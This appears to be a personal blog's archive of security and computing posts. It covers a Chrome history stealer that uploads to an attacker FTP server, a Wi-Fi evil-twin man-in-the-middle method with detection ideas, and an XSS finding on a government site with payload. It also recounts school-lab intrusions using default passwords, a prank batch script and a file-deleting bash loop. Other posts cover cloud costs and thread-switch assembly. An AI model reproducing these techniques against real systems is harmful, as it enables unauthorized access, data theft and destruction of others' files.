Category Archives: Computers


I have started writing some malicious code for fun lately. The first one is a chrome history stealer. As the name goes, it uploads the history file to a remote FTP server of the attacker’s choice.

Why History?
I believe in this quote

“Show me a man’s browser history, i will tell you who he (is) (was) (will be)”

Browser history is one of the most sensitive information on your computer, it can be as sensitive as a passwd file. The reason being, the amount of time people spend on the Internet. Going through one’s browsing history is like pop opening one’s brain and walking right through it. The whole human thought process can be visualized on examining a browser history.

Okay, you’ve got me watching pr0n, is that it?
Browser history contains more interesting things to analyze than just to determine if someone is watching pron or not. It is like robbing a car parked on the garage of an unlocked house, instead of going for the whole house. Browser History contains patterns, what you like, what you don’t like. What you do when you are happy, what you do when you are sad. Who do you stalk on Facebook, what all the shameless ‘How to’s’ you googled for. Infact, this the patttern which Google uses to determine appropriate ads for you and display. In other words the Internet’s browsing pattern is worth 42 Billion $.

The pattern can be used to predict behavior, uncover lies, expose desires, determine knowledge and even more. A wonderful research area would be to work on generating a model based on browser history which would determine/predict/assert possible actions that might be taken by the owner of the browser history.

I decided to write this one off in C#, to stay in touch with it since my initial encounter on last summer. A throwaway free hosting account is all you need to get started with this. The downside of free hosting was, i cannot have a single file of more than 10Megs in size.
Hence i had to compress the file before uploading.

DISCLAIMER: Do not run this code on a machine without the owner’s permission, For education purposes only.

It is here, a service to report back how many times your friend changed his picture in Facebook. Thanks to my friend Naveen for changing his picture quite often which eventually gave birth to this tiny script.

import socket
import feedparser
#FB Notificiation RSS Parse
def fbParse():
cover = 0
profile = 0
fbFeed = feedparser.parse('_YOUR_FB_RSS_FEED_URL')
for post in fbFeed.entries:
view raw nktService hosted with ❤ by GitHub

An ideal way to do such tasks would be to put the graph API in use, but i wanted to roll out this feature in an hour since someone already complained about, him changing his picture frequently. It’s all about the timing, no?

This script uses your personal Facebook RSS Notification feed, from which items of interest are parsed. Since i didn’t want to bind my RSS Notification Feed URL in a program and distribute it to all, i made this as a client server program. The client can be a custom written one or a standard utility like netcat.

For more information on how to get this running, visit the repository.

Happy Hacking!

90 days of Summer

No, not a sequel of the movie ‘500 Days of Summer’. This is about my 3 month long internship at TradeHero.

I peaked my productivity chart once again after a very very long time (read, after 3 years). The last time i was this productive, was during my 3rd year at college. It all started with a long travel on 28th May, 2013 from Göteborg to Singapore via Köpenham and Zurich.

I reached Singapore on 29th and navigated myself to the booked accommodation at Jalan Bukit Merah. 30th May was my first day at TradeHero. Ajay was the first one i met, he introduced me to Abert, Tho, Arup, Brendon and every one else. Julien, Dominic, Gary and Maddy were at the conference room when i came in.  After meeting every one, Julien and Maddy helped me to set up the dev environment.

The thing i like more about TradeHero is, they are a lot like Facebook. They have very high goals and they move very fast. It was my first day and by after noon, i was asked to design a permanent solution for the bug i found before i joined and i had to explain it on the White Board, which i duly did.  Arup had some questions on the security of the Algorithm which was answered by me and Dominic (The CTO) gave the go.

I was a lot less productive during my first week, thanks to my addiction to vi and nano, that was the first time i used a proper IDE on a windows platform after VB6. I got up to a very slow start, .aspx, C# everything were new to me. If you know me, you would have known that i was more of a C/C++/Python/php/Linux/Apache/AWS guy. But the dev environment at TradeHero was like, C#/ Server/Azure, It was a sharp learning curve and i’m really happy about picking up a couple of languages over the summer.

A couple of weeks onto my internship, i was already peaking my all time commit levels, i reached my  longest 8 day streak and when people ask me how did my internship go, i show them this

That’s 31,527 lines of code and 62 commits, i think that qualifies my internship experience to be mentioned in some sort of superlative tense.

[really_simple_share button=”facebook_like”]

Quora’s anonymous answers and Facebook Graph Search

The reason for providing an Anonymous answering functionality is to prevent someone from tracing the answer back to you (perhaps to prevent a flame war or you getting fired or God knows what could happen). But if you give reasonable information in your anonymously written answer, which in combination with your  badly configured Facebook profile, can be quite lethal to you.

Let us take this answer for an example. From the question and the answer, anyone can understand that the OP was a student at College of Engineering, Guindy, An ex-employee at Voltas and a current student at North Carolina State University.

The below mentioned Facebook Graph Search query seems to pick the right individual

People who studied at College of Engineering, Guindy and worked at Voltas and study at North Carolina State University

It is evident that people are not quite aware of their involuntary privacy leak through their Facebook profile, there is no reason why you have to make all these information about your grad school, previous employers; public. People may say, it helps their lost friends to get back in touch with them, which i agree, but at what cost?

Facebook Graph Search is a two edged sword that can be quite useful as it was to me when i used it to reunite with a family friend after nearly 14 years of no contact and also be equally dangerous as in the anonymous poster’s case!

ps: This post has nothing to do with my recent outrage against CEG. Infact, i agree with the OPs answer 🙂

Low-Medium Critical Infrastructure Security

As the Internet says

                              Security is as strong as it’s weakest link.

While researchers are busy with analyzing stuxnet and duqu, there exists a wide range of ICS on the internet with relatively less or almost no security at all.  Current research covers just the high critical targets while low-medium critical targets or almost ignored. I wouldn’t say that the strategy of researchers are wrong, they are right, it is the right choice to protect a oil refinery from a intruder rather than protect a water treatment plant of a golf course. It must be the responsibility of the vendors to protect against such attacks; actually it doesn’t requires that much of a path breaking research to protect these (low-medium critical) devices, the right architecture and right configuration is what all it needs to secure these devices.

I don’t know how many would believe if i say i’ve saw this thing many times before the news even broke out. It was just hanging around in Shodan. The default password was 100 or 101 i believe, if my memory cells are still intact. One does not need a high probability NIDS to protect the infrastructure of these devices, since they are hardly being targeted by industrial/political espionage or terror attacks. People who hijack these devices are simple script kiddies or psychopaths.

I’m not saying that the security of low-medium critical systems should be taken lightly, but instead of leaving it alone just like that without any protective measures, with the time being i think few very basic solutions by the vendors or Infrastructure Admin might keep those script kiddies away.

By basic solutions i mean,

* Make VPN support available out of the box

* Banner display to show last logged in time, IP and host names.

* Strong Passwords

* Clean or deceptive banners, after all that is how Shodan identifies you.

* Strip out legacy services like FTP, SNMP.

* A sticker which says “Do not connect this thing to internet without a basic VPN” 🙂


MiTM attacks on Open WiFi Hotspots

Since it is so trivial to set WiFi Hotspots as open networks in order to reduce the complexity of the infrastructure setup; A question arises how one can remain safe from MiTM attacks which takes advantage of the inherent trust between the connecting client and the Access Point. As Vivek Ramachandran in his series of WiFi security primer video says there is no way for the client to authenticate the Access Point to which it is connecting to.

If you are a novice in wireless security, then first para might sound like selvaraghavan’s movie;  I’ll explain how MiTM attacks are performed on open (networked) Access Points [WiFi Hotspots to be in precise].

MiTM is popularly called as Man in the Middle Attack or you can use Hak5 Darren’s expansion Monkey in the Middle Attack. In case of a open network all the data as well as management 802.11 (wifi) packets traveling around you in the air are unencrypted, though the management packets  are unencrypted even in WEP and WPA networks, but that’s a different story.

Few of the Management Packets are

* Beacon Packet
* Probe Request, Response
* Authentication Request, Response
* Association Request, Response
* Disassociation Request, Response
* De Authentication Request, Response

In order to perform a MiTM attack the attacker must make the clients connected to the original AP to connect to him. The attacker can achieve this by keep on performing a Deauth attack on the access point, thereby disconnecting all legitimate clients from the legitimate AP and use airbase-ng to setup a fake AP in the same name as the legitimate AP thereby attracting the users towards him. Signal strength need not to be higher than the legitimate AP, because the legitimate AP is hammered by a continuous deauth attack.

Assume that the WiFi Hotspot’s network is like this and the network name is freewifi, At normal working case, the client happily connects to the free wifi access point and transfers data


The Attacker may start sending De Auth Broadcast Management packets for the bssid of free wifi thereby making all the clients to disconnect from freewifi Access point.

Next the Attacker sets up his own Access Point by the name of freewifi, but with a different bssid using airbase-ng, since the attacker’s fake AP advertises itself as freewifi, the client goes ahead and connects to the attacker’s AP. This is where the inherent trust of the client over AP is exploited.

Now that the client is connected to us believing that we are the freewifi access point and sends data(unencrypted) to us and we happily intercept the data monitor it and forward it to internet through our  source either using a 3G phone or a data card. We have the option to tamper, monitor, modify the user’s data.

Detecting MiTM Attacks:

So now,  if we have something in the host(client) computer that verifies the AP’s BSSID (mac id), it would be easy to find out a MiTM attack. You may think “Mac spoofing is a peice of cake and what if the attacker launches his duplicate AP with the same bssid (mac id) as the legitimate ones, The Verification mechanism will be rendered useless right?” My answer is Yes, but No. If the attacker changes the BSSID of the fake AP which he created using airbase-ng as the same one as legitimate AP’s he would end up deauthenticating his fake AP aswell as both have same SSID. so technically, unless the attacker has a high gain, directional antennae, he would not change the BSSID of his fake AP to reflect the original AP.

Now, i plan to follow up this with a python daemon program, which manages a file with list of AP’s along with its BSSID’s, so whenver you are connected to a network it checks whether you had previously connected to that network or not. if yes, it checks the BSSID which will be different in case of a MiTM and same in case of Normal usage.

Cloud Computing with Amazon EC2

Cloud Computing with Amazon EC2

Audience criteria: This article is written for beginners in cloud computing so if you are a pro I would recommend you to skip this article

Cloud dem(y)istified

Wherever I go I hear people around me using the term cloud computing but their understanding of the concept is barely Minimum. Here is the popular youtube video which shows how much cloud computing is being misunderstood due to its catchy name.

An unorthodox definition to cloud computing would be “ The method of computing in which the physical machine which processes or gathers your data is present in the cloud. ” Cloud is nothing but The Internet

Note: The above mentioned definition is completely unorthodox and you’ll definitely not get 2 marks if you write this answer in Anna University examination.

Example for cloud computing:

Note: This is a very basic example, if you have a basic idea of cloud and its example i would recommend you to skip this paragraph.

Knowingly or unknowingly every one of us use one or the several features of cloud computing in a day-to-day routine, the best and simplest example for a cloud based service is Gmail. The service offered by Gmail is SaaS [ Software as a Service]. It means Gmail offers its software for people over the cloud. Now lets do a bit of substitution, what software does Gmail offer? A web based email client. What is a cloud? It’s the Internet. So after substituting the answers to these questions we get this “ Gmail offers its web based email client over the internet. “ All the emails in your account are physically stored in google’s data centers which is in the cloud aka hooked to the internet and you are accessing it from your computer via internet.

Why Cloud ?

I’ll walk you through this question using a case study. Lets take Anna University results publication as our example. is the web server maintained by Anna University (Ramanujam Computing Center, i guess) for publishing its affiliated college’s semester examination results. Every one will experience the bottleneck effect at least for the first 6 hours  right after the results are published. Though Anna University hardly cares about this effect, lets presume Anna University as a more of student friendly university and it plans to do something about this bottleneck effect during results.

The Problem

   The problem here is too simple to identify, the HTTP requests from ferocious students eagerly expecting their results flood the TCP queue of the server (See DDoS). So a logical solution is to add a Load Balancer and widely distribute the requests to some 3 or 4 servers depending on the results [Some times 3rd to 7th semester results are published at same time, which will definitely need more than 2 servers to handle the load; one the other hand some times these results are published individually so 1 or 2 server would be enough to handle the requests at peak time.]

Solution A proposed by some leet Admin at Anna University:

Buy a Load Balancer                        –      Apprx cost $2000

Lower High-end Core i7 server with 6 Gigs RAM  X 4   –  900$ X 4 =  3600$

Power charges for these machines                –  xxx$

Consolidated cost  =    5600 $ + xxx$ per month + Network Maintenance charges + Server Upgrade Charges   ~ 7600$ per year


Solution B – The cloud way

2 * Rent a Extra Large Hi CPU on Demand Instance from Asia Pacific Zone for the first 24 hours  -0.76$ per hr

Change the Extra Large Instance to  Small on demand instance for the rest period –  $0.095 per hr

EBS storage  –  $0.1 per GB – month. At the max  our data won’t cross 10 GB mark so lets assume – $1/mo

Imagine EBS as a block of storage (HDD) attached to your instance

Load Balancer cost  – 0.025$/hr

Consolidated cost =   36.48$ + 68.4$/mo + $1/mo + 0.6$  = 37.08$ + 68.4$/mo

Results are published twice a year, so 2 days in a year we will be needing the 2 Extra Large instance with load balancer and for the remaining days a small instance is enough for handling the traffic.

For a year the cost will be =  2 * 37.08$ + 68.4$ * 12 = 74.16$ + 820.8$ =  894.96$

Solution B can serve the University 7 to 8 years with the cost spent on solution A


Pros on Solution B

  • Terrible cost cutting method
  •  Completely scalable architecture

“ Say if the university decides to publish the result for 3rd semester students alone separately then according to solution A we can’t save anything as the hardware is already up and running, but according to solution B we can opt for a Medium Hi CPU on Demand Instance or something more corresponding, we could add and remove memory just in few clicks or even we could automate the process using amazon’s api.”

  • Going Green.  ( I Don’t want to speak more about it in this post )

Cons on Solution B

  • Remember the Virginia Zone  Amazon Data Center’s Blackout, which pulled several famous sites along with it. So wise decision would be to host your instance in two different zones or at least have a mirrored EBS volume of your instance in some other zone for redundancy.


I’ve been learning ” Operating Systems and Systems Programming ” Online for a while. I use University of California, Berkley’s Online Webcast lectures and Operating Systems Design and Implementation by Andrew S.Tanenbaum as reading material.

I’m blogging here something which is a simple concept though, performs complex working.

Multithreading is a concept, which makes an illusion of  one or more threads running in parallel. To put up in a simple way, only one thread runs at a time, after a specific threshold time the 1st thread stops and 2nd thread continues running, again after the threshold time 2nd thread stops and 1st resumes running thereby creating a illusion of two threads running at same time.

I’m diving straight into the topic, as the basic concepts are out of scope to this article.

Here is an extract from Prof. John kubiatowicz slide

Consider two threads S and T. Consider S is running. A and B are the routines in each thread. After a specific threshold time or  some boundary value or why not, sometimes even after receiving a interrupt signal the running thread (Thread S) makes a yield call. The yield returns the control of execution to the kernel. The kernel checks for waiting threads i.e the threads in runnable state [sometimes based on priority] and makes a call to switch routine, The sweetest of all.

Switch routine accepts two inputs [current thread pointer and new thread pointer]. The basic functionality of switch looks like this.

Seems simple enough, Registers of current thread [Thread S] is saved to TCB[tCur].regs.rx and the values of new thread’s registers TCB[tNew].regs.rx is over written to the CPU registers CPU.rx. The overwritten registers include stack pointer and return address. After the switch performs its process the control is shifted back to the kernel and the kernel hands over the control to the routine whose address is stored in newly overwritten Instruction pointer. In our case thread T starts running. As instructed by Prof.john kubiatowicz, i had a look at the nachos source code for switch.

Switch.S is written in assembly. It has 4 subroutines [MIPS,SPARC,HP RISC,INTEL], each subroutine is called in specific to the CPU architecture. I’ll discuss here the INTEL’s subroutine alone.

/* void SWITCH( thread *t1, thread *t2 )
** on entry, stack looks like this:
**      8(esp)  ->              thread *t2
**      4(esp)  ->              thread *t1
**       (esp)  ->              return address
** we push the current eax on the stack so that we can use it as
** a pointer to t1, this decrements esp by 4, so when we use it
** to reference stuff on the stack, we add 4 to the offset.
        .comm   _eax_save,4
        .globl  _SWITCH
        movl    %eax,_eax_save          # save the value of eax
        movl    4(%esp),%eax            # move pointer to t1 into eax
        movl    %ebx,_EBX(%eax)         # save registers
        movl    %ecx,_ECX(%eax)
        movl    %edx,_EDX(%eax)
        movl    %esi,_ESI(%eax)
        movl    %edi,_EDI(%eax)
        movl    %ebp,_EBP(%eax)
        movl    %esp,_ESP(%eax)         # save stack pointer
        movl    _eax_save,%ebx          # get the saved value of eax
        movl    %ebx,_EAX(%eax)         # store it
        movl    0(%esp),%ebx            # get return address from stack into ebx
        movl    %ebx,_PC(%eax)          # save it into the pc storage
        movl    8(%esp),%eax            # move pointer to t2 into eax
        movl    _EAX(%eax),%ebx         # get new value for eax into ebx
        movl    %ebx,_eax_save          # save it
        movl    _EBX(%eax),%ebx         # retore old registers
        movl    _ECX(%eax),%ecx
        movl    _EDX(%eax),%edx
        movl    _ESI(%eax),%esi
        movl    _EDI(%eax),%edi
        movl    _EBP(%eax),%ebp
        movl    _ESP(%eax),%esp         # restore stack pointer
        movl    _PC(%eax),%eax          # restore return address into eax
        movl    %eax,4(%esp)            # copy over the ret address on the stack
        movl    _eax_save,%eax

4(esp) points to thread S and 8(esp) points to thread T, thread S’s address is pulled to eax and all the registers viz ebx,ecx,edx etc are stored with respect to eax.   ex: register ecx gets stored to _ECX(%eax) . Then 8(esp) is loaded to eax, and all registers of thread T are loaded to cpu register. ex: register _ECX(%eax) is loaded to %ecx. The return address of each threads are saved and exchanged respectively.

ps: The diagrams were taken from Prof. John kubiatowicz‘s slides.

University Lab Fun (in)security

As an Ex Electrical Engineering Student, i didn’t have opportunities to take many computer science lab courses, as neither the course work nor the electives were flexible.

You know it right, its ANNA UNIVERSITY.

But,thanks to the IT boom, i had

  • Fundamentals of Computer Lab
  • Data Structures Lab
  • Objected Oriented Programming Lab
  • Communication Lab [English]
  • Power System Simulation Lab

Let me walk you through the fun stuffs which i/we had during these labs.

Fundamentals of Computer Lab:

As I was a Fresher,I stayed below the radar and didn’t try anything adventurous. So it typically went like normal lab sessions.

Data Structures Lab:

The lab was entirely based on C, so we were given an unique user id and password, which was merely our roll numbers [ee199 is mine], sadly there was no provision to change the default password. The user id-password was for mounting the user specific directories to the system, so that students could store their programmes on their respective shares. As I was a sophomore at that time, I limited myself to logging into other user’s account and deleting their programs, nothing other than that because i was a bit coward at that time, yeah you read it right i was coward at THAT TIME.

Objected Oriented Programming Lab:

We did C++ and Java, it was the third year and, I was peaking in presentations and coding competitions. The only difference between data structures lab and OOP lab setup was the GUI. We had access to the windows ME machine in OOP lab, whereas in the DSA(Data Structures and Algorith) lab we were given with DOS & Turbo C. The storage part was lamer than the previous lab, as the programs were saved in /bin/ of C drive, and guess what, the c Drives were Shared over the network, so i had to just browse down to a specific user’s bin directory [//system22/c/] and change his/her programs to some random shit, like displaying weird characters on the screen in different colors and running through a infinite loop.

However during the later part they [system admins], were smart enough to change the program storage/execution directory to a NFS, which used to get mounted at the time of logging in. But they were not smart enough to change the password of the server to anything other than “peccc5lab”, so my job became easier. start->run-> //cc5server/c$/eee would list all users’ directories starting from ee101 to ee230 where their programs are stored. Pwnd!

Communication Lab [English]:

It was the same laboratory as the OOP , the lamest lab which I had, it was something similar to the TOEFL exam, The questions used to be generated from a database, and the database file was luckily running from the cc5server which I mentioned above, so I was able to change the questions to anything I want.The funniest part was that, I could have even done the same for the university exams. The procedure was, to send the users database file to Anna University in which the marks were present according to the answers they provided. Before the University Exam, I had the opportunity to view the users.mdb file [//cc5server/c$/exam/users.mdb], surprisingly the marks were encrypted, i thought of copying the encrypted value of my class topper to mine, but what if the marks were encrypted with the roll number as key. So, if i had swapped my marks, it wouldn’t have been able to decipher it, and i would have got landed in a lot of trouble!, so I refrained from doing it.. I even tried to take a look at the .asp file which pulls the questions and reports the answer back, but time didn’t permit and the staffs walking around the lab was watching me as if i looked like a Alien.

Other than this, I used to cause havoc between students using net sent commands. It was a simple trick, As the c drives used to be shared, I used to change the autoexec.bat of system-y to something like

  • @echo off.
  • net send system-x hey as***le !
  • start c:elclient.exe

and change the shortcut link for EL client to open the autoexec,bat file. So when the user in system-y opens his EL client, System-x used to recieve a message displaying as***le! sent from system-y. So it was fun to see the users in system-x and system-y fight with each other.

Ps: EL client is the software in which we used to work, i hardly opened that software.

Power System Simulation Lab:

I have already blogged about this, you can check it here

Operating Systems Lab at SVCE:

Thanks to the Jump start 2 for bringing back the fun part again. This time it was OS lab and we were taught with basic linux commands like ls,chmod,cat,editors [vi] [for some reason the instructor never mentioned emacs, emacs FTW] ,and some pretty basic stuffs. It was easy for me, no i’m not blaming the instructor. they had to cover each and every student, and many of them did not have any idea on either Linux and computers or Rankine cycle, but they used to brag about that they were the mec*sterz ,meh. But she [ the instructor] did not ask me to close my terminal, in which I was teaching my friend about grep and pipe, Never mind. And in the exercise, each user was asked to create files on their home directory i.e exam01…. exam01 was the username given to 90% of the users on that session. Again it was a NFS [Network FIle System], as the files created by each user started appearing in every users’ home directory, some mothafucka created files with filenames that hurt my friend. So the evil inside BORIS stepped out to cook a bash script []

	for((; ; ) )
	rm /exam/exam01/*
	sleep 60

chmod a+x

../ &

and the charming script was running in the background, which deleted every file users created to learn on that lab. I’m now guilty of making no one to use of the OS lab, I wouldn’t have done it, if the file names were not that rude.

Ps: If you are creating a lab environment for students, then better rely on NFS with different passwords or share less local system disk with limited user privileges.

Pps:Try these at your own risk

Thats it for now, I’m tired of typing from 6:30 pm, and now the time is 9:09pm & thanks to vignesh for editing this post

Good Bye,alvida!

NASA has it, And so Does DRDO

NASA has it, FBI has it, Most of the Govt agencies/organinzations has it and DRDO also has it, what is it ?

Well thats the most common security flaw in web applications  ” THE XSS (Cross Site Scripting)”.  XSS vulnerabilities are due to improper or lack of sanitization of input variables in server side scripts, which leads to execute external/embedded javascripts on the client side browser.

Vulnerable URL:<script>alert(‘XSS is here’);</script>

The vulnerability lies in the index.jsp page, the variable “pg” is not properly sanitized, thats why it allows artibrary javascript to be included. But the goodness here is, it does not allows remote javascripts to be run.<SCRIPT/XSS SRC=””></SCRIPT>

The above script will not work because, the administrator at DRDO was smart enough to set the REMOTE INCLUDE [something like that, i forgot the exact name] to DISALLOW in apache server configuration, thats why scripts within the host directory will alone run.

If the above setting [remote include]  had not been  done another serious vulnerability would have been induced, Its RFI [REMOTE FILE INCLUSION]

From the above URL’s it is pretty obvious that the index.jsp’s pg variable includes the local jsp page [awards.jsp/Director.jsp] in the frame, so if the remote include feature had been set on, we could have uploaded a jsp shell script on our server and we could included it inside index.jsp.

so that it will get executed on DRDO’s server and w00t, DRDO would have been r00t’ed.

This Vulnerablility had been reported to keeda/null on 17-10-10